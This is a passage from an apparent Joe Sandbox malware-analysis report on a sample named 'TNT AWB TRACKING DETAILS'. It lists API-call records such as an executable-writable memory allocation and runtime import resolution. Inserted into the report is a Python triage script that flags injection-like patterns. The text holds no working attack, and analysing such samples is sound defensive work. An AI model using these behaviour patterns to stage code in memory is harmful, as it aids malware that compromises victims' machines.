                                                    • API String ID: 4014797782-2298589950
                                                    • Opcode ID: 7d75a49a4a1144e3c6994dd0a60e5ef90e255e8fb07079eab0ee1646e55a0a4e
                                                    • Instruction ID: 5c61ef474a1af78b6554f98a09770525224ee427b950442dc7d48049795e8902
                                                    • Opcode Fuzzy Hash: 7d75a49a4a1144e3c6994dd0a60e5ef90e255e8fb07079eab0ee1646e55a0a4e
                                                    • Instruction Fuzzy Hash: F0214FB5604208AFDB11EF24DCC1DB73BECEB5A764B140059FA159B3A1CB71EC11AB60
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F46D3B
                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F46D4B
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F46D70
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$MoveWindow
                                                    • String ID: Listbox
                                                    • API String ID: 3315199576-2633736733
                                                    • Opcode ID: 6bc7f1d190a2c973c1eb4d4dd216bd539fcafe0b0553569cd2de69a31c016ce4
                                                    • Instruction ID: 800e15b232e2be607ede44ba68195d9e2fbc3b7f74f39a6bd2f3ffa8027c918b
                                                    • Opcode Fuzzy Hash: 6bc7f1d190a2c973c1eb4d4dd216bd539fcafe0b0553569cd2de69a31c016ce4
                                                    • Instruction Fuzzy Hash: 9221A732A11118BFEF118F54DC85FBB3BBAEF8A764F018124FE459B190C6719C51A7A1
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F47772
                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F47787
                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F47794
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: msctls_trackbar32
                                                    • API String ID: 3850602802-1010561917
                                                    • Opcode ID: 926b5e34026a2d618d4d3be0d30e950163524b1b1f13fc7c17a7b8c5c7e63724
                                                    • Instruction ID: cd0b81b12b659657738579e02ec8db165c2e5f4cf255715f1d40de51be196564
                                                    • Opcode Fuzzy Hash: 926b5e34026a2d618d4d3be0d30e950163524b1b1f13fc7c17a7b8c5c7e63724
                                                    • Instruction Fuzzy Hash: 1F112772644308BBEF106F64CC01FEB7BA9EF89B64F014118FA45A2191C772E811EB10
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00EC4B83,?), ref: 00EC4C44
                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00EC4C56
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-1355242751
                                                    • Opcode ID: b3c834c27b74ae63152dc912af6090d1e8677c34cbd1a7a17ead6dc67b294a73
                                                    • Instruction ID: 3a44667c45192b97c12c3f2bdc6d9999b5af740bcc720142e4d7b3e828ee45c8
                                                    • Opcode Fuzzy Hash: b3c834c27b74ae63152dc912af6090d1e8677c34cbd1a7a17ead6dc67b294a73
                                                    • Instruction Fuzzy Hash: 09D0C270900713CFD7204F31CA08B06B6D4AF02348B10C83ED899D61B0E670C480E611
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00EC4BD0,?,00EC4DEF,?,00F852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EC4C11
                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00EC4C23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                    • API String ID: 2574300362-3689287502
                                                    • Opcode ID: adf31762fc5ddddd7ab2b15adc5851f8b2594c24fefd76a5428b42f18caf00af
                                                    • Instruction ID: 8636f544932632f8bcfb8c0c2a831f36491d3387fc2f22712a71ed24fea87b54
                                                    • Opcode Fuzzy Hash: adf31762fc5ddddd7ab2b15adc5851f8b2594c24fefd76a5428b42f18caf00af
                                                    • Instruction Fuzzy Hash: EBD0C2B0900713CFD7205F70CA08A07BAD5EF4A349B00CC3E9889D21A0E6B0C480D711
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,00F41039), ref: 00F40DF5
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F40E07
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: 7348862616a8f8f44356c315a766b62dcbb001a3a43deea639badcbd59e57e2c
                                                    • Instruction ID: 515d598ef7bc6eef3d2f65d92ae08c4ba8baa9357dbcc3cb1fc8e87e90d193b7
                                                    • Opcode Fuzzy Hash: 7348862616a8f8f44356c315a766b62dcbb001a3a43deea639badcbd59e57e2c
                                                    • Instruction Fuzzy Hash: D6D0C770800336CFC3208F70C808A827AE4AF11362F04CC3E998AC6150EAB0D8A0EA02
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00F38CF4,?,00F4F910), ref: 00F390EE
                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00F39100
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                    • API String ID: 2574300362-199464113
                                                    • Opcode ID: 4ab49000aa3da0094f6a6665e419647552958067ec496340902f16d183985dcb
                                                    • Instruction ID: e24a90527d01302e33d87bece3cd5f449beae8dfacebfa1738843dc604cdf940
                                                    • Opcode Fuzzy Hash: 4ab49000aa3da0094f6a6665e419647552958067ec496340902f16d183985dcb
                                                    • Instruction Fuzzy Hash: 06D01274954713CFD7209F31D81C54676D4AF563A5F11C83AD88AD6650E6B0C884E691
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: LocalTime__swprintf
                                                    • String ID: %.3d$WIN_XPe
                                                    • API String ID: 2070861257-2409531811
                                                    • Opcode ID: e644c9116ce673b822ae063f9a166bdc90e42f7a56d934fd7185ec28f322a27f
                                                    • Instruction ID: c9f9382e6b3d024a94d200ef2c4bbbe46defaf7e0cc5b72bbd3ce1cd1406e016
                                                    • Opcode Fuzzy Hash: e644c9116ce673b822ae063f9a166bdc90e42f7a56d934fd7185ec28f322a27f
                                                    • Instruction Fuzzy Hash: D9D0127284410DEBC7109B909988EF9777CB719311F541462F806A2080E261C759F622
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1cf1a30d806392e6285aa09b52fb6e698dcc38b0fe9b024aee5e68004ed466a5
                                                    • Instruction ID: 91c932cb83ca3bcd986e9b1a3ae4cf3bf22b30669890843ec56614e6eabfb9e2
                                                    • Opcode Fuzzy Hash: 1cf1a30d806392e6285aa09b52fb6e698dcc38b0fe9b024aee5e68004ed466a5
                                                    • Instruction Fuzzy Hash: C7C16C75A04216EFCB14DFA4C884EAEBBB5FF48714B148599F809EB251D730ED81EB90
                                                    APIs
                                                    • CharLowerBuffW.USER32(?,?), ref: 00F3E0BE
                                                    • CharLowerBuffW.USER32(?,?), ref: 00F3E101
                                                      • Part of subcall function 00F3D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00F3D7C5
                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F3E301
                                                    • _memmove.LIBCMT ref: 00F3E314
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                     • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                    • String ID:
                                                    • API String ID: 3659485706-0
                                                    • Opcode ID: fb5f713311c1173152e893b1d00beb68f4d7616141e011fb306ecf49bebed029
                                                    • Instruction ID: 55cd3282d2003f35f2f0278932849f17992305cf4ee94d44bce8258fbd24eff1
                                                    • Opcode Fuzzy Hash: fb5f713311c1173152e893b1d00beb68f4d7616141e011fb306ecf49bebed029
                                                    • Instruction Fuzzy Hash: 43C13971A08341DFC714DF28C480A6ABBE4FF89724F14896DF8999B391D771E946CB82
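                                                     The function records in this section are the raw material a triage analyst has to read by hand: a VirtualAllocEx reached through a subcall (top of the section), lazy LoadLibraryA/GetProcAddress resolution of Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection, and, in the record directly above, a VirtualAlloc of 0x77 bytes with flProtect 00000040 (PAGE_EXECUTE_READWRITE) followed by _memmove into it. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses these "APIs" lines, decodes the page-protection argument, and flags the three patterns (cross-process-capable allocation, writable+executable allocation, a copy into that allocation, and runtime resolution of watched imports). The sample input is the report's own lines copied verbatim; the protection-constant table, the argument-index table and the watch-list are the example's own choices. Caveat: the runtime of a compiled AutoIt script legitimately resolves the Wow64 redirection APIs (the >>>AUTOIT NO CMDEXECUTE<<< string on the same call stack is an AutoIt interpreter marker), so the output is a list of leads to confirm against the memory dump, not a verdict.

```python
"""Triage helper for Joe Sandbox "APIs" records (added example, not report tooling)."""
import re
from typing import Optional

# A report line looks like one of these; the bullet and an optional
# "Part of subcall function X:" prefix are skipped by regex search:
#   • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F3E301
#   • _memmove.LIBCMT ref: 00F3E314
API_RE = re.compile(
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"   # Name.MODULE
    r"(?:\((?P<args>[^)]*)\))?"                           # optional argument list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{6,8})"              # call-site address
)

# Win32 flProtect values; EXEC_MASK/WRITE_MASK select the PAGE_EXECUTE* and writable ones.
PAGE_FLAGS = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
              0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
              0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
EXEC_MASK, WRITE_MASK = 0xF0, 0xCC
# 0-based index of the protection argument for each allocator (example's own table).
PROTECT_ARG = {"VirtualAlloc": 3, "VirtualAllocEx": 4, "NtAllocateVirtualMemory": 5}
COPY_APIS = {"_memmove", "memcpy", "RtlMoveMemory", "WriteProcessMemory", "NtWriteVirtualMemory"}
# Imports worth a second look when resolved at runtime instead of via the import table
# (watch-list chosen for this example).
WATCHED_RESOLVES = {"Wow64DisableWow64FsRedirection", "Wow64RevertWow64FsRedirection",
                    "NtUnmapViewOfSection", "NtWriteVirtualMemory", "CreateRemoteThread",
                    "SetThreadContext", "NtSetContextThread", "QueueUserAPC"}


def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None                      # argument Joe Sandbox could not recover
    if re.fullmatch(r"[0-9A-Fa-f]{8}", tok):
        return int(tok, 16)              # 32-bit immediate or pointer
    return tok                           # resolved string literal ("kernel32.dll", ...)


def parse_api_line(line: str) -> Optional[dict]:
    m = API_RE.search(line)
    if not m:
        return None
    args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
    return {"api": m["api"], "module": m["module"], "args": args, "ref": int(m["ref"], 16)}


def describe_protect(prot: int) -> str:
    base = PAGE_FLAGS.get(prot & 0xFF, f"0x{prot & 0xFF:02X}")
    return base + (" | PAGE_GUARD" if prot & 0x100 else "")


def triage_record(lines) -> list:
    """Return human-readable findings for one function record (its 'APIs' lines, in order)."""
    findings, rwx_seen = [], False
    for c in filter(None, map(parse_api_line, lines)):
        api, args, ref = c["api"], c["args"], f"{c['ref']:08X}"
        if api in PROTECT_ARG:
            idx = PROTECT_ARG[api]
            prot = args[idx] if idx < len(args) else None
            if api != "VirtualAlloc":      # takes a process handle, so it can target another process
                findings.append(f"{api}@{ref}: allocation through a process handle (cross-process capable)")
            if isinstance(prot, int) and prot & EXEC_MASK and prot & WRITE_MASK:
                rwx_seen = True
                findings.append(f"{api}@{ref}: writable+executable region ({describe_protect(prot)})")
        elif api == "GetProcAddress":
            name = next((a for a in args if isinstance(a, str)), None)
            if name in WATCHED_RESOLVES:
                findings.append(f"GetProcAddress@{ref}: {name} resolved at runtime")
        elif api in COPY_APIS and rwx_seen:
            findings.append(f"{api}@{ref}: bytes copied after the RWX allocation (code staging)")
    return findings


# Sample input: "APIs" lines of three records copied from this report.
RECORD_INJECT = [
    "• Part of subcall function 00F213DE: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00F1925A,00000034,?,?,00001004,00000000,00000000), ref: 00F2142F",
    "• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00F198AC",
]
RECORD_STAGE = [
    "• CharLowerBuffW.USER32(?,?), ref: 00F3E0BE",
    "• VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F3E301",
    "• _memmove.LIBCMT ref: 00F3E314",
]
RECORD_RESOLVE = [
    "• LoadLibraryA.KERNEL32(kernel32.dll,?,00EC4BD0,?,00EC4DEF,?,00F852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00EC4C11",
    "• GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00EC4C23",
]

if __name__ == "__main__":
    for label, rec in (("00F213DE subcall", RECORD_INJECT), ("00F3E0BE", RECORD_STAGE), ("00EC4C11", RECORD_RESOLVE)):
        for finding in triage_record(rec) or ["no findings"]:
            print(f"[{label}] {finding}")
```

                                                     Feed it the "APIs" lines of each record (the bullets between an "APIs" header and the next "Strings" or "Memory Dump Source" header); the order matters, since the staging rule only fires for a copy that follows an RWX allocation in the same function. The trailing arguments Joe Sandbox lists beyond an API's real arity are stack residue, which is why the protection is read by fixed index rather than from the end of the list.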
                                                    APIs
                                                    • CoInitialize.OLE32(00000000), ref: 00F380C3
                                                    • CoUninitialize.OLE32 ref: 00F380CE
                                                      • Part of subcall function 00F1D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00F1D5D4
                                                    • VariantInit.OLEAUT32(?), ref: 00F380D9
                                                    • VariantClear.OLEAUT32(?), ref: 00F383AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                    • String ID:
                                                    • API String ID: 780911581-0
                                                    • Opcode ID: baf10106616d20f64cfa00b73daf0d89082bcb774e9f2b981580d8d44cd95d97
                                                    • Instruction ID: c16c4d849610ba690bc72994d00310a2589148f4e97dc29c64b2fc899d133358
                                                    • Opcode Fuzzy Hash: baf10106616d20f64cfa00b73daf0d89082bcb774e9f2b981580d8d44cd95d97
                                                    • Instruction Fuzzy Hash: CBA147766047019FCB04DF24C985B2AB7E4BF89764F14444CF99AAB3A2CB35ED06DB42
                                                    APIs
                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00F52C7C,?), ref: 00F176EA
                                                    • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00F52C7C,?), ref: 00F17702
                                                    • CLSIDFromProgID.OLE32(?,?,00000000,00F4FB80,000000FF,?,00000000,00000800,00000000,?,00F52C7C,?), ref: 00F17727
                                                    • _memcmp.LIBCMT ref: 00F17748
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: FromProg$FreeTask_memcmp
                                                    • String ID:
                                                    • API String ID: 314563124-0
                                                    • Opcode ID: 8f94051e2e88270bf322c9184b3b94fe8eac105196bf6332a08712a8c1a98bd7
                                                    • Instruction ID: c5130c89505b6476f5364ad68227ceb9032d6d09a7d83b58927a4318e69510b4
                                                    • Opcode Fuzzy Hash: 8f94051e2e88270bf322c9184b3b94fe8eac105196bf6332a08712a8c1a98bd7
                                                    • Instruction Fuzzy Hash: FC812F75A00209EFCB04DFA4C984EEEB7B9FF89315F204558F509AB250DB71AE46DB60
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    • Opcode ID: eebfae6f50708670a9d84a40d12c090c1e8adfc6067598ce3fe68f699c4ea457
                                                    • Instruction ID: 861445f675ee50362626ad647cf67f93ba34b8a3a307d67b3019d24d6f52f081
                                                    • Opcode Fuzzy Hash: eebfae6f50708670a9d84a40d12c090c1e8adfc6067598ce3fe68f699c4ea457
                                                    • Instruction Fuzzy Hash: FC51E7757003029BDB24EF65D895BBAB7E5AF45310F20D81FE586EB291DB78D8C1AB00
                                                    APIs
                                                      • Part of subcall function 00EC4EE5: _fseek.LIBCMT ref: 00EC4EFD
                                                      • Part of subcall function 00F29734: _wcscmp.LIBCMT ref: 00F29824
                                                      • Part of subcall function 00F29734: _wcscmp.LIBCMT ref: 00F29837
                                                    • _free.LIBCMT ref: 00F296A2
                                                    • _free.LIBCMT ref: 00F296A9
                                                    • _free.LIBCMT ref: 00F29714
                                                      • Part of subcall function 00EE2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00EE9A24), ref: 00EE2D69
                                                      • Part of subcall function 00EE2D55: GetLastError.KERNEL32(00000000,?,00EE9A24), ref: 00EE2D7B
                                                    • _free.LIBCMT ref: 00F2971C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                    • String ID:
                                                    • API String ID: 1552873950-0
                                                    • Opcode ID: c4026c6fdf79114d0ce0d5391f8c5e6d50e3694d2df04886e7dc2db769373755
                                                    • Instruction ID: aa1604f4e575f6124bde39921f0cd12ed252c08dfc0690e98affc63db3beac4c
                                                    • Opcode Fuzzy Hash: c4026c6fdf79114d0ce0d5391f8c5e6d50e3694d2df04886e7dc2db769373755
                                                    • Instruction Fuzzy Hash: 4B516DB1E04268AFDF259F65DC81A9EBBB9EF48300F10049EF209B3241DB715A81CF58
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00F49863
                                                    • ScreenToClient.USER32(00000002,00000002), ref: 00F49896
                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00F49903
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
